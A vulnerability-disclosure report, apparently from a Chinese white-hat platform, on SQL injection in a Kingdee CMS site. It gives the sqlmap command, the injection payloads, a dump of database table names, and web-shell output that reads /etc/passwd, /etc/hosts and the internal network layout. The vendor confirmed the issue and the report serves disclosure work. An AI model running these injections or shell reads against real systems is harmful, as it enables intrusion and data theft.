2015-04-28: 细节已通知厂商并且等待厂商处理中 2015-04-28: 厂商已经确认,细节仅向厂商公开 2015-05-08: 细节向核心白帽子及相关领域专家公开 2015-05-18: 细节向普通白帽子公开 2015-05-28: 细节向实习白帽子公开 2015-06-12: 细节向公众公开
...
金蝶站点:cms.kisdee.comIP: 118.194.40.103
Sqlmap.exe -u "http://cms.kisdee.com/yp/product.php?prowhere=1" -v 3 --dbms=mysql注入
sqlmap identified the following injection points with a total of 23 HTTP(s) requests:---Place: GETParameter: prowhere Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: prowhere=1) AND (SELECT 5495 FROM(SELECT COUNT(*),CONCAT(0x3a6d6f723a,(SELECT (CASE WHEN (5495=5495) THEN 1 ELSE 0 END)),0x3a7969753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2144=2144 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: prowhere=1) LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCAT(0x3a6d6f723a,0x79667a6853524b774958,0x3a7969753a)# Vector: LIMIT 1,1 UNION ALL SELECT NULL, NULL, [QUERY]#---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: prowhere Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: prowhere=1) AND (SELECT 5495 FROM(SELECT COUNT(*),CONCAT(0x3a6d6f723a,(SELECT (CASE WHEN (5495=5495) THEN 1 ELSE 0 END)),0x3a7969753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2144=2144 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: prowhere=1) LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCAT(0x3a6d6f723a,0x79667a6853524b774958,0x3a7969753a)# Vector: LIMIT 1,1 UNION ALL SELECT NULL, NULL, [QUERY]#---available databases [2]:[*] information_schema[*] KDPortalsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: prowhere Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: prowhere=1) AND (SELECT 5495 FROM(SELECT COUNT(*),CONCAT(0x3a6d6f723a,(SELECT (CASE WHEN (5495=5495) THEN 1 ELSE 0 END)),0x3a7969753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2144=2144 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: prowhere=1) LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCAT(0x3a6d6f723a,0x79667a6853524b774958,0x3a7969753a)# Vector: LIMIT 1,1 UNION ALL SELECT NULL, NULL, [QUERY]#---Database: KDPortal+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| phpcms_member_group_priv | 807962 || phpcms_log | 523885 || zm_ip | 371671 || ys_api_access | 370740 || ys_feedback | 336509 || phpcms_search | 124022 || phpcms_content | 118638 || phpcms_content_count | 116683 || phpcms_c_news | 110427 || phpcms_ads_stat | 106401 || phpcms_admin_role_priv | 101413 || phpcms_hits | 84484 || ys_use_log | 66395 || phpcms_content_tag | 53760 || phpcms_attachment | 39544 || phpcms_special_content | 27912 || ys_opportunity | 26706 || zhj_315_invite | 23781 || kdcms_faqsearch | 12453 || moweekly_wp_comments | 12393 || phpcms_keyword | 11451 || ys_ips | 10332 || kdcms_hits | 8598 || kdcms_manual | 7990 || kdcms_manual_data | 7990 || phpcms_menu | 7436 || phpcms_c_policy | 7417 || phpcms_category | 7351 || kdcms_category | 7020 || zm_user_credit | 6249 || zhj_315_poll_log | 5893 || kdcms_log | 5851 || kdcms_faq | 5646 || kdcms_faq_data | 5646 || zz_thewise_reg | 5556 || zhj_315_user | 3531 || kdcms_linkage | 3285 || kdcms_search | 3130 || phpcms_app_share | 2680 || phpcms_content_position | 2408 || kdcms_attachment | 2364 || phpcms_comment | 2283 || lsw_user_state | 2102 || kdcms_attachment_index | 1982 || phpcms_copyfrom | 1365 || zhj_315_award | 1350 || EM_USER | 1239 || lsw_user | 1123 || phpcms_author | 1103 || kdcms_cache | 1097 || phpcms_pay_exchange | 937 || phpcms_special | 935 || ms_info | 918 || kdcms_admin_role_priv | 773 || lsw_func | 660 || ys_site | 657 || kdcms_position_data | 620 || ys_recycler | 617 || EE_DIGG_LOG | 615 || ee_order_list | 605 || member | 585 || EE_AWARD_LOG | 571 || phpcms_model_field | 564 || kdcms_model_field | 455 || kdcms_category_priv | 449 || phpcms_block | 427 || fouryear_user | 399 || ee_news_detail | 398 || phpcms_c_app | 384 || kdcms_menu | 334 || moweekly_wp_term_relationships | 333 || kdcms_comment_data_1 | 309 || moweekly_wp_posts | 309 || kdcms_operationcase | 300 || kdcms_operationcase_data | 300 || kdcms_ebook | 299 || kdcms_ebook_data | 299 || kdcms_news | 284 || kdcms_news_data | 284 || phpcms_admin_role | 271 || kdcms_video | 245 || kdcms_video_data | 245 || phpcms_c_ent_case | 227 || agiletour_bingo | 207 || auction_log | 204 || ys_coolsite | 204 || kdcms_comment | 195 || moweekly_wp_postmeta | 187 || zz_search_log | 183 || phpcms_app_suggest | 176 || moweekly_wp_options | 150 || phpcms_yp_stats | 146 || phpcms_member | 139 || phpcms_member_cache | 139 || phpcms_member_info | 139 || kdcms_case | 134 || kdcms_case_data | 134 || tmp_case829 | 127 || fouryear_kill | 120 || ys_bianma | 110 || kis_collection | 108 || cards | 106 || phpcms_ads | 105 || EE_MESSAGE | 99 || phpcms_link | 99 || phpcms_ads_place | 92 || em_special | 87 || answer | 77 || ys_livesite | 76 || kdcms_content_check | 73 || kdcms_down | 61 || kdcms_down_data | 61 || phpcms_c_ent_patch | 60 || phpcms_app_category | 51 || phpcms_type | 50 || ee_product_comment | 49 || moweekly_wp_usermeta | 48 || ys_class | 48 || ys_config | 48 || auction_product | 47 || phpcms_pay_stat | 47 || phpcms_position | 47 || kdcms_clientid | 43 || kdcms_clientid_data | 43 || phpcms_c_product | 42 || kdcms_ep_define | 38 || kdcms_ep_define_data | 38 || phpcms_cache_count | 37 || auction_orderlist | 34 || phpcms_urlrule | 34 || moweekly_wp_term_taxonomy | 28 || ys_search | 28 || moweekly_wp_terms | 27 || kdcms_module | 25 || phpcms_ask_actor | 25 || phpcms_member_detail | 24 || phpcms_model | 24 || phpcms_module | 24 || question | 23 || phpcms_process_status | 21 || kdcms_model | 20 || phpcms_c_kis_product | 20 || kdcms_type | 17 || phpcms_c_ent_product | 15 || phpcms_role | 14 || ys_mingzhan | 14 || kdcms_video_charge | 12 || kdcms_video_charge_data | 12 || ys_coolclass | 12 || ys_index_common_use | 12 || ys_index_hot_dowm | 12 || ys_index_tool | 12 || phpcms_c_ent_solution | 11 || phpcms_space | 11 || phpcms_vote_option | 11 || ee_product | 10 || kdcms_position | 10 || kdcms_poster | 10 || kdcms_poster_space | 10 || kdcms_urlrule | 9 || kdcms_yf_product | 9 || kdcms_yf_product_data | 9 || phpcms_status | 9 || moweekly_wp_links | 8 || ys_searchclass | 8 || kdcms_admin_role | 7 || kdcms_member_group | 7 || phpcms_c_alliance_case | 7 || phpcms_c_event | 7 || phpcms_c_zhj_customer | 7 || phpcms_editor_data | 7 || phpcms_member_group | 7 || kdcms_download | 6 || kdcms_download_data | 6 || kdcms_workflow | 6 || phpcms_process | 6 || phpcms_search_type | 6 || em_class_info | 5 || kdcms_admin_panel | 5 || kdcms_site | 5 || kdcms_sso_settings | 5 || moweekly_wp_users | 5 || phpcms_app_industry | 5 || phpcms_player | 5 || em_product_class | 4 || fouryear_product | 4 || kdcms_template_bak | 4 || phpcms_spider_job | 4 || ys_liveclass | 4 || kdcms_admin | 3 || kdcms_member_menu | 3 || phpcms_workflow | 3 || ys_admin_user | 3 || kdcms_announce | 2 || kdcms_link | 2 || phpcms_admin | 2 || phpcms_area | 2 || phpcms_datasource | 2 || phpcms_pay_pointcard_type | 2 || phpcms_space_api | 2 || phpcms_spider_sites | 2 || phpcms_times | 2 || kdcms_application | 1 || kdcms_application_data | 1 || kdcms_comment_setting | 1 || kdcms_comment_table | 1 || kdcms_picture | 1 || kdcms_picture_data | 1 || kdcms_session | 1 || kdcms_sso_admin | 1 || kdcms_sso_applications | 1 || kdcms_videodemo | 1 || kdcms_videodemo_data | 1 || kdcms_wap | 1 || phpcms_keylink | 1 || phpcms_mood | 1 || phpcms_mood_data | 1 || phpcms_session | 1 || phpcms_vote_subject | 1 || zm_admin_info | 1 || zz_thewise | 1 |+--------------------------------+---------+
[Linux debian-604-clean 2.6.32-5-amd64 #1 SMP Sat Mar 31 04:00:05 UTC 2012 x86_64(daemon)]/usr/local/ysstore/deploy/apache_portal/cms>cd //>ls -altotal 400drwxr-xr-x 22 root root 4096 May 17 2012 .drwxr-xr-x 22 root root 4096 May 17 2012 ..drwxr-xr-x 2 root root 4096 Oct 8 2014 bindrwxr-xr-x 3 root root 4096 Apr 27 2012 bootdrwxr-xr-x 13 root root 2980 Feb 4 16:25 devdrwxr-xr-x 68 root root 4096 Feb 4 16:25 etcdrwxr-xr-x 2 root root 4096 May 31 2012 homelrwxrwxrwx 1 root root 30 Apr 27 2012 initrd.img -> boot/initrd.img-2.6.32-5-amd64drwxr-xr-x 11 root root 12288 Apr 28 2012 libdrwxr-xr-x 2 root root 12288 Apr 27 2012 lib32lrwxrwxrwx 1 root root 4 Apr 27 2012 lib64 -> /libdrwx------ 2 root root 16384 Apr 27 2012 lost+founddrwxr-xr-x 4 root root 4096 Apr 27 2012 mediadrwxr-xr-x 2 root root 4096 Jan 13 2012 mntdrwxr-xr-x 2 root root 4096 Apr 27 2012 optdr-xr-xr-x 151 root root 0 Feb 4 16:25 procdrwx------ 7 root root 4096 Dec 31 10:44 rootdrwxr-xr-x 2 root root 4096 Apr 27 2012 sbindrwxr-xr-x 2 root root 4096 Jul 21 2010 selinuxdrwxr-xr-x 2 root root 4096 Apr 27 2012 srvdrwxr-xr-x 13 root root 0 Feb 4 16:25 sysdrwxrwxrwt 2 root root 303104 Apr 27 15:51 tmpdrwxr-xr-x 13 root root 4096 May 17 2012 usrdrwxr-xr-x 13 root root 4096 Apr 27 2012 varlrwxrwxrwx 1 root root 27 Apr 27 2012 vmlinuz -> boot/vmlinuz-2.6.32-5-amd64/>ifconfigeth0 Link encap:Ethernet HWaddr 00:50:56:bf:00:35 inet addr:192.168.223.136 Bcast:192.168.223.255 Mask:255.255.255.0 inet6 addr: fe80::250:56ff:febf:35/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:230310969 errors:0 dropped:0 overruns:0 frame:0 TX packets:309544330 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:62579541022 (58.2 GiB) TX bytes:308678048964 (287.4 GiB)lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:7651048 errors:0 dropped:0 overruns:0 frame:0 TX packets:7651048 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:751215062 (716.4 MiB) TX bytes:751215062 (716.4 MiB)lo:157 Link encap:Local Loopback inet addr:192.168.223.157 Mask:255.255.255.255 UP LOOPBACK RUNNING MTU:16436 Metric:1/>arp -a? (192.168.223.133) at 00:50:56:bf:00:3b [ether] on eth0? (192.168.223.129) at 00:50:56:bf:00:00 [ether] on eth0? (192.168.223.1) at 5c:dd:70:2b:c0:77 [ether] on eth0? (192.168.223.130) at 00:50:56:bf:00:2b [ether] on eth0/>cat /etc/passwdroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shDebian-exim:x:101:103::/var/spool/exim4:/bin/falsestatd:x:102:65534::/var/lib/nfs:/bin/falsesshd:x:103:65534::/var/run/sshd:/usr/sbin/nologinnagios:x:1001:1001::/home/nagios:/bin/bash/>cat /etc/hosts127.0.0.1 localhost127.0.1.1 debian-604-clean.kingdee.gbl debian-604-clean192.168.223.147 api.cmcloud.cn# The following lines are desirable for IPv6 capable hosts::1 ip6-localhost ip6-loopbackfe00::0 ip6-localnetff00::0 ip6-mcastprefixff02::1 ip6-allnodesff02::2 ip6-allrouters/>cat /etc/issueDebian GNU/Linux 6.0 \n \l
···
升级 or 禁用.
危害等级:高
漏洞Rank:15
确认时间:2015-04-28 11:51
谢谢对金蝶的关注,深入研究金蝶系统发现安全漏洞。我们已通知相关部门修复。
暂无
